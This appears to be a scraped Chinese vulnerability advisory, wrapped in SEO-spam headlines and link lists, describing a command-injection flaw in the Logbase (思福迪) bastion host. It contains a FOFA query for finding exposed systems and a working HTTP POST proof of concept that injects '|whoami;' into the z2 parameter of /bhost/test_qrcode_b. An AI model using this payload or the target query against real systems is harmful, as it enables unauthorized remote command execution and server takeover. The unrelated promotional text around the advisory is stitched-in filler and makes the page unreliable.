当前位置: 首页 > news >正文

苏州做网站推广南京seo外包

苏州做网站推广,南京seo外包,门户类网站是什么意思,宿迁宿豫区疫情最新消息0x01 产品简介 思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。 0x02 漏洞概述 由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限&#…

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:

((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: closez1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

http://www.logbase.cn/

http://www.shuangfujiaoyu.com/news/58649.html

相关文章:

  • 网站建设公司推广网站品牌运营廊坊首页霸屏优化
  • wordpress放音乐seo搜索引擎营销工具
  • 外国网站分享代码广告宣传费用一般多少
  • 电商 网站开发 哪个好聊城seo
  • 常熟网站建设专业的公司搜索引擎站长平台
  • 专门做特产的网站搜索引擎营销的特点是什么
  • 编程培训机构名字合肥seo排名优化
  • 单页面网站带后台网络优化公司
  • 北京梦创义网站建设互联网营销师证书有用吗
  • 做五金的有哪些外贸网站推广赚钱app
  • 专业做视频的网站有哪些南宁网站优化
  • wordpress投票模板seo营销培训咨询
  • 广州seo网络培训课程徐州百度seo排名
  • 国内企业网站设计公司网站优化排名查询
  • 网络广告策划流程有哪些?seo怎么优化排名
  • 建设商城网站费用百度指数下载
  • 网站开发和设计如何合作关键词全网搜索工具
  • 做营销网站今日头条新闻推荐
  • 郑州400建站网站建设网站排名优化方案
  • 一千个长尾关键词用一千个网站做p站关键词排名
  • 公司网站开发报价河北百度seo
  • 做企业网站到哪里找关键词自动生成器
  • 网站安全建设方案前言推广app接单网
  • 做企业网站建设自己建网站的详细步骤
  • 网站做排名2015年seo优化培训学校
  • 网站建设包括网页设计站长工具seo优化
  • 绍兴做网站哪家好2020国内搜索引擎排行榜
  • 无锡网站建设工作百度软件中心下载安装
  • 北京网站优化推广青岛网站seo优化
  • 园区二学一做网站贵阳百度seo点击软件